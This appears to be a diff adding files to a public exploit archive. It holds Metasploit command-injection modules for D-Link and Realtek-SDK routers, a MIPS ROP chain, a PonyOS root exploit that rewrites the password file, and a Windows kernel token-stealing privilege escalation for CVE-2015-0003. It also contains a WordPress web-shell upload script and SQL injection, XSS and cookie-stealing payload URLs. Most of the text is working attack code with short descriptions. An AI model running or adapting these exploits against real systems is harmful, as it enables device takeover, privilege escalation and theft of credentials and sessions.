end
def exploit
print_status("#{peer} - Accessing the vulnerable URL...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavour => :echo,
:linemax => 100
)
end
def prepare_shellcode(cmd)
shellcode = rand_text_alpha_upper(target['Offset']) # padding
shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N") # restore registers with controlled values
# 0003FE20 lw $ra, 0x48+var_4($sp)
# 0003FE24 lw $s7, 0x48+var_8($sp)
# 0003FE28 lw $s6, 0x48+var_C($sp)
# 0003FE2C lw $s5, 0x48+var_10($sp)
# 0003FE30 lw $s4, 0x48+var_14($sp)
# 0003FE34 lw $s3, 0x48+var_18($sp)
# 0003FE38 lw $s2, 0x48+var_1C($sp)
# 0003FE3C lw $s1, 0x48+var_20($sp)
# 0003FE40 lw $s0, 0x48+var_24($sp)
# 0003FE44 jr $ra
# 0003FE48 addiu $sp, 0x48
shellcode << rand_text_alpha_upper(36) # padding
shellcode << [target['LibcBase'] + target['System']].pack('N') # s0 - system address-1
shellcode << rand_text_alpha_upper(16) # unused registers $s1 - $s4
shellcode << [target['LibcBase'] + target['CallSystem']].pack('N') # $s5 - call system
# 00041C10 move $t9, $s0
# 00041C14 jalr $t9
# 00041C18 nop
shellcode << rand_text_alpha_upper(8) # unused registers $s6 - $s7
shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N') # write sp to $a0 -> parametre for call to system
# 000215B8 addiu $a0, $sp, 0x20
# 000215BC lw $ra, 0x1C($sp)
# 000215C0 jr $ra
# 000215C4 addiu $sp, 0x20
shellcode << rand_text_alpha_upper(28) # padding
shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N') # add 1 to s0 (calculate system address)
# 000111EC move $t9, $s5
# 000111F0 jalr $t9
# 000111F4 addiu $s0, 1
shellcode << cmd
end
def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => '/cgi-bin/login',
'encode_params' => false,
'vars_post' => {
'redirect' => shellcode,
'user' => rand_text_alpha(5),
'password' => rand_text_alpha(8)
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

118
platforms/hardware/remote/37171.rb Executable file
View file

@ -0,0 +1,118 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Devices HNAP SOAPAction-Header Command Execution',
'Description' => %q{
Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP
interface. Since it is a blind OS command injection vulnerability, there is no
output for the executed command. This module has been tested on a DIR-645 device.
The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
},
'Author' =>
[
'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
'Craig Heffner', # independent Vulnerability discovery on different other routers
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],
['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']
],
'DisclosureDate' => 'Feb 13 2015',
'Privileged' => true,
'Platform' => 'linux',
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target
{
'Arch' => ARCH_MIPSBE
}
]
],
'DefaultTarget' => 0
))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')
end
def check
uri = '/HNAP1/'
soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' => {
'SOAPAction' => soap_action,
}
})
if res && [200].include?(res.code) && res.body =~ /D-Link/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the device ...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavour => :echo,
:linemax => 200,
:temp => ''
)
end
def execute_command(cmd, opts)
uri = '/HNAP1/'
# we can not use / in our command so we need to use a little trick
cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' => {
'SOAPAction' => soap_action,
}
}, 3)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

87
platforms/hardware/webapps/37172.txt Executable file
View file

@ -0,0 +1,87 @@
===============================================================================
title: ClearPass Policy Manager Stored XSS
case id: CM-2014-01
product: Aruba ClearPass Policy Manager
vulnerability type: Stored cross-site script
severity: Medium
found: 2014-11-24
by: Cristiano Maruti (@cmaruti)
===============================================================================
[EXECUTIVE SUMMARY]
The analysis discovered a stored cross site scripting vulnerability (OWASP
OTG-INPVAL-002) in the ClearPass Policy Manager. A malicious unauthenticated
user is able to inject arbitrary script through the login form that may be
rendered and triggered later if a privileged authenticated user reviews the
access audit record. An attack can use the aforementioned vulnerability to
effectively steal session cookies of privileged logged on users.
[VULNERABLE VERSIONS]
The following version of the Aruba ClearPass Policy Manager was affected by the
vulnerability; previous versions may be vulnerable as well:
- Aruba ClearPass Policy Manager 6.4
[TECHNICAL DETAILS]
It is possible to reproduce the vulnerability following these steps:
1. Open the login page with your browser;
2. Put the "><img src=x onerror=alert(1337)><" string in the username field
and fill in the password field with a value of your choice;
3. Submit the form;
4. Login to the application with an administrative user:
5. Go to "Monitoring -> Live monitoring -> Access tracker" to raise the payload.
Below a full transcript of the HTTP request used to raise the vulnerability
HTTP Request
-------------------------------------------------------------------------------
POST /tips/tipsLoginSubmit.action HTTP/1.1
Host: 10.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.1/tips/tipsLoginSubmit.action
Cookie: <A VALID UNAUTH COOKIE>
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
username="><img src=x onerror=alert("0wn3d")><"&password=test
-------------------------------------------------------------------------------
A copy of the report with technical details about the vulnerability I have
identified is available at:
https://github.com/cmaruti/reports/blob/master/aruba_clearpass.pdf
[VULNERABILITY REFERENCE]
The following CVE ID was allocated to track the vulnerability:
- CVE-2015-1389: Stored cross-site scripting (XSS)
[DISCLOSURE TIMELINE]
2014-11-24 Vulnerability submitted to vendor through the Bugcrowd
bounty program.
2014-12-09 Vendor acknowledged the problem.
2014-12-10 Researcher requested to publicly disclose the issue.
2015-02-16 Vendor released a fix for the reported issue.
2015-02-09 Vendor asked to hold-on for the public disclosure.
2015-02-22 Vendor postponed the public disclosure date
2015-02-22 Public coordinated disclosure.
[SOLUTION]
Aruba release an update to fix the vulnerability (ClearPass 6.5 or
later). Please see
the below link for further information released by the vendor:
- http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-006.txt
[REPORT URL]
https://github.com/cmaruti/reports/blob/master/aruba_clearpass.pdf

65
platforms/linux/local/37167.c Executable file
View file

@ -0,0 +1,65 @@
# Exploit Title: PonyOS <= 3.0 VFS permissions exploit
# Google Dork: [if applicable]
# Date: 29th May 2015
# Exploit Author: Hacker Fantastic
# Vendor Homepage: www.ponyos.org
# Software Link: [download link if available]
# Version: 3.0
# Tested on: 3.0
# CVE : N/A
# Source: https://github.com/HackerFantastic/Public/blob/master/exploits/rarity.c
/* MyLittleUnix <= 3.0 VFS permissions root exploit
================================================
File permissions are not checked, we can abuse
this to replace the root user password with our
own and escalate our privileges. This exploit
now 20% cooler and tested on latest 3.0 mlp OS.
-- prdelka
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
char* pwnystr = "root:07821d2459368443042007bf1c7cdf3c55284"
"29a65f8f10ce388d301b47865a283147bfd290545b"
"0b9b12ae622a8eb359497cb3635506f99d2f5e4c4e"
"594cadd:0:0:HackerFantastic:/home/root:/bi"
"n/sh:fancy\n";
int main(){
int fd, r;
struct stat *fileinfo = malloc(sizeof(struct stat));
char *buffer, *line, *filenm = "/etc/master.passwd";
printf("[+] MyLittleUnix <=3.0 VFS permissions local root exploit\n");
fd = open(filenm,O_RDWR);
r = stat(filenm,fileinfo);
buffer = malloc((uint)fileinfo->st_size);
if(buffer){
read(fd,buffer,fileinfo->st_size);
}
else{
printf("[!] No pwn for you pwnie\n");
exit(0);
}
lseek(fd,0,SEEK_SET);
line = strtok(buffer,"\n");
while(line){
if(strstr(line,"root:")){
write(fd,pwnystr,strlen(pwnystr));
}
else{
write(fd,line,strlen(line));
write(fd,"\n",strlen("\n"));
}
line = strtok(NULL,"\n");
}
close(fd);
printf("[-] 20percent COOLER! user 'root' password is 'pwnies'\n");
exit(0);
}

14
platforms/linux/local/37168.txt Executable file
View file

@ -0,0 +1,14 @@
# Exploit Title: PonyOS <= 3.0 ELF loader privilege escalation
# Google Dork: [if applicable]
# Date: 29th May 2015
# Exploit Author: Hacker Fantastic
# Vendor Homepage: www.ponyos.org
# Software Link: [download link if available]
# Version: 3.0
# Tested on: 3.0
# CVE : N/A
Source: https://github.com/mdsecresearch/Publications/blob/master/exploits/rainbowdash.tgz?raw=true
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37168.tgz
Blog post for more detail: http://blog.mdsec.co.uk/2015/05/my-lulzy-pwniez-abusing-kernel-elf.html

167
platforms/linux/remote/37169.rb Executable file
View file

@ -0,0 +1,167 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution',
'Description' => %q{
Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command
injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,
there is no output for the executed command. This module has been tested successfully on a
Trendnet TEW-731BR router with emulation.
},
'Author' =>
[
'Ricky "HeadlessZeke" Lawshae', # Vulnerability discovery
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-8361'],
['ZDI', '15-155'],
['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'],
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055']
],
'DisclosureDate' => 'Apr 24 2015',
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE
}
]
],
'DefaultTarget' => 0
))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')
register_options(
[
Opt::RPORT(52869) # port of UPnP SOAP webinterface
], self.class)
end
def check
begin
res = send_request_cgi({
'uri' => '/picsdesc.xml'
})
if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\/1.0 UPnP\/1.0/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the device ...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavour => :echo,
:linemax => 50,
:nodelete => true
)
end
def execute_command(cmd, opts)
uri = '/wanipcn.xml'
soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'
data_cmd = '<?xml version="1.0"?>' + build_soap_req
begin
res = send_request_cgi({
'uri' => uri,
'vars_get' => {
'service' => 'WANIPConn1'
},
'ctype' => 'text/xml',
'method' => 'POST',
'headers' => {
'SOAPAction' => soap_action
},
'data' => data_cmd.gsub(/CMD_HERE/, "`#{cmd.gsub(/\\/, '\\\\\\\\\\')}`")
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def build_soap_req
new_external_port = rand(32767) + 32768
new_internal_port = rand(32767) + 32768
xml = Document.new
xml.add_element(
'SOAP-ENV:Envelope',
{
'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',
'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'
})
xml.root.add_element('SOAP-ENV:Body')
body = xml.root.elements[1]
body.add_element(
'm:AddPortMapping',
{
'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1'
})
port_mapping = body.elements[1]
port_mapping.add_element('NewLeaseDuration')
port_mapping.add_element('NewInternalClient')
port_mapping.add_element('NewEnabled')
port_mapping.add_element('NewExternalPort')
port_mapping.add_element('NewRemoteHost')
port_mapping.add_element('NewProtocol')
port_mapping.add_element('NewInternalPort')
port_mapping.elements['NewLeaseDuration'].text = ''
port_mapping.elements['NewInternalClient'].text = 'CMD_HERE'
port_mapping.elements['NewEnabled'].text = '1'
port_mapping.elements['NewExternalPort'].text = "#{new_external_port}"
port_mapping.elements['NewRemoteHost'].text = ''
port_mapping.elements['NewProtocol'].text = 'TCP'
port_mapping.elements['NewInternalPort'].text = "#{new_internal_port}"
xml.to_s
end
end

11
platforms/php/webapps/37050.txt Executable file
View file

@ -0,0 +1,11 @@
# Exploit Title: Chronosite 5.12 SQL Injection
# Google Dork: filetype:php inurl:"/archives.php" intext:"ARCHIVES Chrono-site"
# Date: 13/05/15
# Exploit Author: Wad Deek
# Vendor Homepage: http://www.chronosite.org/
# Software Link: http://www.chronosite.org/chrono_upload/chronosite_512.zip
# Version: 5.12
# Tested on: Xampp on Windows7
################################################################
PoC = http://127.0.0.1/cms/chronosite_512/archives.php?numero=%27
################################################################

9
platforms/php/webapps/37155.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53497/info
WP-FaceThumb is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WP-FaceThumb 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/?page_id=1&pagination_wp_facethumb=1"><img/src=x onerror=alert(document.cookie)>

9
platforms/php/webapps/37156.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53501/info
GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
GetSimple CMS 3.1 is vulnerable; other versions may also be affected.
http://www.example.com/getsimple/admin/theme.php?err=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C

9
platforms/php/webapps/37157.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53501/info
GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
GetSimple CMS 3.1 is vulnerable; other versions may also be affected.
http://www.example.com/getsimple/admin/pages.php?error=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C

10
platforms/php/webapps/37158.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/53501/info
GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
GetSimple CMS 3.1 is vulnerable; other versions may also be affected.
http://www.example.com/getsimple/admin/index.php?success=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E
http://www.example.com/getsimple/admin/index.php?err=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E

9
platforms/php/webapps/37159.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53501/info
GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
GetSimple CMS 3.1 is vulnerable; other versions may also be affected.
http://www.example.com/getsimple/admin/upload.php?path=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E&newfolder=rem0ve

9
platforms/php/webapps/37161.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53511/info
The GRAND Flash Album Gallery plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
GRAND Flash Album Gallery 1.71 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=flag-skins&skin=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

9
platforms/php/webapps/37162.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53513/info
Dynamic Widgets plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Dynamic Widgets 1.5.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/themes.php?page=dynwid-config&action=edit&id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

24
platforms/php/webapps/37166.php Executable file
View file

@ -0,0 +1,24 @@
###################################################################################################
# Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability
# Vendor : http://digitalzoomstudio.net/docs/wpzoomsounds/
# Author: bl4ck-dz
# Date: 28/05/2015
# Infected File: upload.php
# Category: webapps
# Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/
# Tested on : Linux | Windows
###################################################################################################
<?php
$evil="dz.phtml";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file_field'=>"@$evil"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch); curl_close($ch);
echo "$postResult";
?>
Shell Access :
http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload/$Evil
# GreeTz : Akram Stelle ~ Mr DZ ~ All DzTeaM Members & all all Dz H4x0rs !

17
platforms/windows/dos/37160.pl Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/53508/info
Universal Reader is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
Universal Reader 1.16.740.0 is vulnerable; other versions may also be affected.
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);

352
platforms/windows/local/37098.txt Executable file
View file

@ -0,0 +1,352 @@
// ex.cpp
/*
Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP
CVE-2015-0003
March 2015 (Public Release: May 24, 2015)
Tested on:
x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3
x64: Win 2k8 SP1 | Win 2k8 R2 SP1
Author: Skylake - skylake <at> mail <dot> com
*/
#include "ex.h"
_ZwAllocateVirtualMemory ZwAllocateVirtualMemory;
_PsLookupProcessByProcessId PsLookupProcessByProcessId;
_PsReferencePrimaryToken PsReferencePrimaryToken;
DWORD Pid;
ATOM atom;
BOOL KrnlMode, bSpawned;
DWORD_PTR WINAPI pti()
{
#ifdef _M_X64
LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 );
return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) );
#else
LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 );
return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) );
#endif
}
BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize )
{
DWORD_PTR dwIndex, dwMask;
#ifdef _M_X64
dwMask = ~0xf;
#else
dwMask = ~7;
#endif
//
dwCurrentValue &= dwMask;
for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ )
{
if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue )
{
//
pdwStructure[dwIndex] = dwNewValue;
return TRUE;
}
}
return FALSE;
}
BOOL WINAPI Init()
{
HMODULE hMod = NULL;
PVOID Base = NULL;
OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) };
PSYSTEM_MODULE_INFORMATION pm = NULL;
BOOL RetVal = FALSE;
__try {
if( !GetVersionEx( &ov ) ) __leave;
if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 )
{
atom = 0xc039;
}
else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 )
{
atom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a;
}
if( !atom ) __leave;
_ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" );
if( !ZwQuerySystemInformation ) __leave;
ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" );
if( !ZwAllocateVirtualMemory ) __leave;
ULONG len;
LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len );
if( !status ) __leave;
pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len );
if( !pm ) __leave;
status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len );
if( status ) __leave;
CHAR szKrnl[MAX_PATH] = { 0 }, *t;
for( ULONG i = 0; i < pm->Count; ++i )
{
if( strstr( pm->Module[i].ImageName, "exe" ) )
{
t = strstr( pm->Module[i].ImageName, "nt" );
if( t )
{
strcpy_s( szKrnl, _countof( szKrnl ) - 1, t );
Base = pm->Module[i].Base;
break;
}
}
}
hMod = LoadLibraryA( szKrnl );
if( !hMod || !Base ) __leave;
PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" );
if( !PsLookupProcessByProcessId ) __leave;
PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) );
PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" );
if( !PsReferencePrimaryToken ) __leave;
PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) );
Pid = GetCurrentProcessId();
RetVal = TRUE;
}
__finally {
if( pm ) LocalFree( pm );
if( hMod ) FreeLibrary( hMod );
}
return RetVal;
}
LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam )
{
LPVOID pCurProcess = NULL;
LPVOID pSystemInfo = NULL;
PACCESS_TOKEN systemToken;
PACCESS_TOKEN targetToken;
PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess );
PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo );
targetToken = PsReferencePrimaryToken( pCurProcess );
systemToken = PsReferencePrimaryToken( pSystemInfo );
//
find_and_replace_member( ( PDWORD_PTR ) pCurProcess,
( DWORD_PTR ) targetToken,
( DWORD_PTR ) systemToken,
0x200 );
KrnlMode = TRUE;
return 0;
}
VOID WINAPI leave()
{
keybd_event( VK_ESCAPE, 0, 0, NULL );
keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL );
keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL );
}
LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam )
{
if( bSpawned )
{
leave();
ExitProcess( 0 );
}
switch( message )
{
case WM_CREATE:
SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL );
FlashWindow( hWnd, TRUE );
keybd_event( VK_LWIN, 0, 0, NULL );
break;
case WM_CLOSE:
DestroyWindow( hWnd );
break;
case WM_DESTROY:
PostQuitMessage( 0 );
break;
case WM_TIMER:
KillTimer( hWnd, ID_TIMER );
leave();
DestroyWindow( hWnd );
break;
default:
return DefWindowProc( hWnd, message, wParam, lParam );
}
return 0;
}
int APIENTRY _tWinMain( _In_ HINSTANCE hInstance,
_In_opt_ HINSTANCE hPrevInstance,
_In_ LPTSTR lpCmdLine,
_In_ int nCmdShow )
{
WNDCLASSEX wc = { sizeof( WNDCLASSEX ) };
HWND hWnd = NULL;
MSG Msg = { 0 };
SIZE_T size = 0x1000;
LPVOID addr = ( LPVOID ) 1;
if( !Init() ) return 1;
if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) )
{
//
return 1;
}
DWORD_PTR p = pti();
if( !p ) return 1;
#ifdef _M_X64
*( ( PDWORD_PTR ) 0x10 ) = p;
*( ( LPBYTE ) 0x2a ) = 4;
*( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode;
*( ( PDWORD_PTR ) 0xa8 ) = 0x400;
*( ( LPDWORD ) 0x404 ) = 1;
*( ( PDWORD_PTR ) 0x408 ) = 0x800;
*( ( LPWORD ) 0x410 ) = atom;
*( ( LPBYTE ) 0x412 ) = 1;
#else
*( ( LPDWORD ) 0x08 ) = p;
*( ( LPBYTE ) 0x16 ) = 4;
*( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode;
*( ( LPDWORD ) 0x6c ) = 0x400;
*( ( LPDWORD ) 0x404 ) = 1;
*( ( LPDWORD ) 0x408 ) = 0x800;
*( ( LPWORD ) 0x40c ) = atom;
*( ( LPBYTE ) 0x40e ) = 1;
#endif
wc.lpfnWndProc = WndProc;
wc.hInstance = hInstance;
wc.lpszClassName = TEXT( "Class" );
if( !RegisterClassEx( &wc ) )
return 1;
hWnd = CreateWindowEx(
WS_EX_CLIENTEDGE,
TEXT( "Class" ),
TEXT( "Window" ),
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT, 200, 100,
NULL, NULL, hInstance, NULL );
if( !hWnd )
return 1;
ShowWindow( hWnd, SW_HIDE );
UpdateWindow( hWnd );
while( GetMessage( &Msg, NULL, 0, 0 ) )
{
if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010
{
if( !KrnlMode )
{
Msg.hwnd = ( HWND ) NULL;
}
else
{
Msg.hwnd = hWnd;
if( !bSpawned )
{
ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW );
bSpawned = TRUE;
}
}
}
TranslateMessage( &Msg );
DispatchMessage( &Msg );
}
return ( int ) Msg.wParam;
}
// EOF
//ex.h
#pragma once
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) (
_In_ HANDLE ProcessHandle,
_Inout_ PVOID *BaseAddress,
_In_ ULONG_PTR ZeroBits,
_Inout_ PSIZE_T RegionSize,
_In_ ULONG AllocationType,
_In_ ULONG Protect
);
typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) (
_In_ HANDLE ProcessId,
_Out_ PVOID *Process
);
typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) (
_Inout_ PVOID Process
);
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemModuleInformation = 11
} SYSTEM_INFORMATION_CLASS;
